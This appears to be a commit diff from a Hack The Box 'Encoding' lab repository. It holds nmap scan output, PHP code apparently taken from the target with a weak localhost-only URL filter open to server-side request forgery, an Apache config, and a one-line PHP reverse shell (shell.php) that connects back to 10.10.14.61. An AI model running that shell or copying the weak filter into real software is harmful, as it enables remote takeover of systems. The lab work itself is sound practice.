,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=&#xa; 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK"><table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">4fe3a667a227f9118dc30ed773a02c28</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">816e78766b8aea7d1babd436b7f8ecc4</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.52" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.52</cpe></service><script id="http-title" output="HaxTables"><elem key="title">HaxTables</elem>
</script><script id="http-server-header" output="Apache/2.4.52 (Ubuntu)"><elem>Apache/2.4.52 (Ubuntu)</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<osmatch name="HP P2000 G3 NAS device" accuracy="91" line="35037">
<osclass type="storage-misc" vendor="HP" osfamily="embedded" accuracy="91"><cpe>cpe:/h:hp:p2000_g3</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0" accuracy="89" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="89"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.4" accuracy="89" line="68176">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="89"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.4" accuracy="88" line="68103">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="OpenWrt Kamikaze 7.09 (Linux 2.6.22)" accuracy="88" line="61524">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:2.6.22</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="88" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="88" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="87" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="87"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="87"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34)" accuracy="87" line="46778">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.4.X" accuracy="87"><cpe>cpe:/o:linux:linux_kernel:2.4</cpe></osclass>
</osmatch>
<osmatch name="OpenWrt White Russian 0.9 (Linux 2.4.30)" accuracy="87" line="46817">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.4.X" accuracy="87"><cpe>cpe:/o:linux:linux_kernel:2.4.30</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63D5726D%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=B)&#xa;SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%II=I%TS=A)&#xa;OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T6(R=N)&#xa;T7(R=N)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
</os>
<uptime seconds="3975677" lastboot="Tue Dec 13 19:46:08 2022"/>
<distance value="2"/>
<tcpsequence index="255" difficulty="Good luck!" values="E9BE12CA,A3101395,E95E70DA,7146064C,326727AD,EB2A0B78"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="ECF7C0E0,ECF7C154,ECF7C1AC,ECF7C212,ECF7C279,ECF7C2DC"/>
<trace port="21" proto="tcp">
<hop ttl="1" ipaddr="10.10.14.1" rtt="25.03"/>
<hop ttl="2" ipaddr="10.129.123.2" rtt="26.51" host="encoding.htb"/>
</trace>
<times srtt="27771" rttvar="2857" to="100000"/>
</host>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<runstats><finished time="1674932845" timestr="Sat Jan 28 20:07:25 2023" summary="Nmap done at Sat Jan 28 20:07:25 2023; 1 IP address (1 host up) scanned in 29.16 seconds" elapsed="29.16" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

74
HTB/encoding/results/scans/xml/_top_100_udp_nmap.xml Normal file
View File

@@ -0,0 +1,74 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2" start="1674932816" startstr="Sat Jan 28 20:06:56 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="UDP Scan" time="1674932816"/>
<taskend task="UDP Scan" time="1674932904" extrainfo="100 total ports"/>
<taskbegin task="Service scan" time="1674932905"/>
<taskprogress task="Service scan" time="1674932970" percent="6.25" remaining="976" etc="1674933945"/>
<taskend task="Service scan" time="1674933002" extrainfo="16 services on 1 host"/>
<taskbegin task="Traceroute" time="1674933005"/>
<taskend task="Traceroute" time="1674933005"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1674933005"/>
<taskend task="Parallel DNS resolution of 1 host." time="1674933016"/>
<taskbegin task="NSE" time="1674933016"/>
<taskprogress task="NSE" time="1674933047" percent="99.36" remaining="1" etc="1674933047"/>
<taskend task="NSE" time="1674933059"/>
<taskbegin task="NSE" time="1674933059"/>
<taskend task="NSE" time="1674933060"/>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<host starttime="1674932816" endtime="1674933060"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="84">
<extrareasons reason="port-unreach" count="84" proto="udp" ports="7,9,17,19,49,53,67,69,88,123,136-139,158,161-162,427,443,445,497,500,514-515,518,623,626,631,996-997,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,4444,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185,49188,49191,49194,49200-49201,65024"/>
</extraports>
<port protocol="udp" portid="68"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcpc" method="table" conf="3"/></port>
<port protocol="udp" portid="80"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="http" method="table" conf="3"/></port>
<port protocol="udp" portid="111"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="rpcbind" method="table" conf="3"/></port>
<port protocol="udp" portid="120"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="cfdptkt" method="table" conf="3"/></port>
<port protocol="udp" portid="135"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="udp" portid="177"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="xdmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="520"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="route" method="table" conf="3"/></port>
<port protocol="udp" portid="593"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="http-rpc-epmap" method="table" conf="3"/></port>
<port protocol="udp" portid="998"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="puparp" method="table" conf="3"/></port>
<port protocol="udp" portid="999"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="applix" method="table" conf="3"/></port>
<port protocol="udp" portid="3703"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="adobeserver-3" method="table" conf="3"/></port>
<port protocol="udp" portid="4500"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="nat-t-ike" method="table" conf="3"/></port>
<port protocol="udp" portid="49186"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49190"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49192"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49193"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
</ports>
<os><portused state="closed" proto="udp" portid="7"/>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=1/28%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63D57344%P=x86_64-pc-linux-gnu)&#xa;SEQ(CI=Z%II=I)&#xa;SEQ(CI=Z)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<distance value="2"/>
<trace port="49152" proto="udp">
<hop ttl="1" ipaddr="10.10.14.1" rtt="25.83"/>
<hop ttl="2" ipaddr="10.129.123.2" rtt="26.04" host="encoding.htb"/>
</trace>
<times srtt="25941" rttvar="1098" to="100000"/>
</host>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<runstats><finished time="1674933060" timestr="Sat Jan 28 20:11:00 2023" summary="Nmap done at Sat Jan 28 20:11:00 2023; 1 IP address (1 host up) scanned in 243.96 seconds" elapsed="243.96" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

1
HTB/encoding/shell.php Normal file
View File

@@ -0,0 +1 @@
$sock=fsockopen("10.10.14.61",5555);exec("sh <&3 >&3 2>&3");

71
HTB/encoding/target/api.utils.php Normal file
View File

@@ -0,0 +1,71 @@
<?php
// Global functions
function jsonify($body, $code = null)
{
if ($code) {
http_response_code($code);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($body);
exit;
}
function get_included_contents($filename) {
ob_start();
include $filename;
return ob_get_clean();
}
function get_url_content($url){
$domain = parse_url($url, PHP_URL_HOST);
if (gethostbyname($domain) === "127.0.0.1") {
jsonify(["message" => "Unacceptable URL"]);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$url_content = curl_exec($ch);
curl_close($ch);
return $url_content;
}
function make_api_call($action, $data, $uri_path, $is_file = false){
if ($is_file) {
$post = [
'data' => file_get_contents($data),
'action' => $action,
'uri_path' => $uri_path
];
} else {
$post = [
'data' => $data,
'action' => $action,
'uri_path' => $uri_path
];
}
$ch = curl_init();
$url = 'http://api.haxtables.htb' . $uri_path . '/index.php';
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post));
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
?>

54
HTB/encoding/target/api.v2.tools.string.index.php Normal file
View File

@@ -0,0 +1,54 @@
<?php
include_once '../../header.php';
include_once '../../../utils.php';
include_once 'utils.php';
start();
if (isset($_FILES['data_file'])) {
$action = $_POST['action'];
$data = file_get_contents($_FILES['data_file']['tmp_name']);
} else {
$jsondata = json_decode(file_get_contents('php://input'), true);
$action = $jsondata['action'];
$data = $jsondata['data'];
if ( empty($jsondata) || !array_key_exists('action', $jsondata))
{
echo jsonify(['message' => 'Insufficient parameters!']);
}
}
if ($action === 'str2hex') {
echo jsonify(['data'=> str2hex($data)]);
} else if ($action === 'hex2str') {
echo jsonify(['data' => hex2str($data) ]);
} else if ($action === 'md5') {
echo jsonify(['data'=> md5($data)]);
} else if ($action === 'sha1') {
echo jsonify(['data'=> sha1($data)]);
} else if ($action === 'urlencode') {
echo jsonify(['data'=> urlencode($data)]);
} else if ($action === 'urldecode') {
echo jsonify(['data'=> urldecode($data)]);
} else if ($action === 'b64encode') {
echo jsonify(['data'=> base64_encode($data)]);
} else if ($action === 'b64decode') {
echo jsonify(['data'=> base64_decode($data)]);
} else {
echo jsonify(['message'=> 'Invalid action'], 404);
}
?>

17
HTB/encoding/target/api.v3.tools.string.utils.php Normal file
View File

@@ -0,0 +1,17 @@
<?php
// Version 3
// String functions
function str2hex($string) {
return bin2hex($string);
}
function hex2str($integer) {
if (!preg_match("/^[0-9A-Fa-f]+$/", $integer)) {
return 'Invalid characters specified';
} else {
return hex2bin($integer);
}
}
?>

58
HTB/encoding/target/api.v3.tools.strings.index.php Normal file
View File

@@ -0,0 +1,58 @@
<?php
include_once '../../../utils.php';
include_once 'utils.php';
if (isset($_FILES['data_file'])) {
$action = $_POST['action'];
$data = file_get_contents($_FILES['data_file']['tmp_name']);
} else {
$jsondata = json_decode(file_get_contents('php://input'), true);
$action = $jsondata['action'];
if ( empty($jsondata) || !array_key_exists('action', $jsondata))
{
echo jsonify(['message' => 'Insufficient parameters!']);
}
if (array_key_exists('file_url', $jsondata)) {
$data = get_url_content($jsondata['file_url']);
} else {
$data = $jsondata['data'];
}
}
if ($action === 'str2hex') {
echo jsonify(['data'=> str2hex($data)]);
} else if ($action === 'hex2str') {
echo jsonify(['data' => hex2str($data) ]);
} else if ($action === 'md5') {
echo jsonify(['data'=> md5($data)]);
} else if ($action === 'sha1') {
echo jsonify(['data'=> sha1($data)]);
} else if ($action === 'urlencode') {
echo jsonify(['data'=> urlencode($data)]);
} else if ($action === 'urldecode') {
echo jsonify(['data'=> urldecode($data)]);
} else if ($action === 'b64encode') {
echo jsonify(['data'=> base64_encode($data)]);
} else if ($action === 'b64decode') {
echo jsonify(['data'=> base64_decode($data)]);
} else {
echo jsonify(['message'=> 'Invalid action'], 404);
}
?>

54
HTB/encoding/target/default-sites.txt Normal file
View File

@@ -0,0 +1,54 @@
<VirtualHost *:80>
ServerName haxtables.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerName api.haxtables.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/api
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerName image.haxtables.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/image
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
#SecRuleEngine On
<LocationMatch />
SecAction initcol:ip=%{REMOTE_ADDR},pass,nolog,id:'200001'
SecAction "phase:5,deprecatevar:ip.somepathcounter=1/1,pass,nolog,id:'200002'"
SecRule IP:SOMEPATHCOUNTER "@gt 5" "phase:2,pause:300,deny,status:509,setenv:RATELIMITED,skip:1,nolog,id:'200003'"
SecAction "phase:2,pass,setvar:ip.somepathcounter=+1,nolog,id:'200004'"
Header always set Retry-After "10" env=RATELIMITED
</LocationMatch>
ErrorDocument 429 "Rate Limit Exceeded"
<Directory /var/www/image>
Deny from all
Allow from 127.0.0.1
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</DIrectory>
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Process finished with exit code 0

71
HTB/encoding/target/utils.php Normal file
View File

@@ -0,0 +1,71 @@
<?php
// Global functions
function jsonify($body, $code = null)
{
if ($code) {
http_response_code($code);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($body);
exit;
}
function get_included_contents($filename) {
ob_start();
include $filename;
return ob_get_clean();
}
function get_url_content($url){
$domain = parse_url($url, PHP_URL_HOST);
if (gethostbyname($domain) === "127.0.0.1") {
jsonify(["message" => "Unacceptable URL"]);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$url_content = curl_exec($ch);
curl_close($ch);
return $url_content;
}
function make_api_call($action, $data, $uri_path, $is_file = false){
if ($is_file) {
$post = [
'data' => file_get_contents($data),
'action' => $action,
'uri_path' => $uri_path
];
} else {
$post = [
'data' => $data,
'action' => $action,
'uri_path' => $uri_path
];
}
$ch = curl_init();
$url = 'http://api.haxtables.htb' . $uri_path . '/index.php';
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post));
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
?>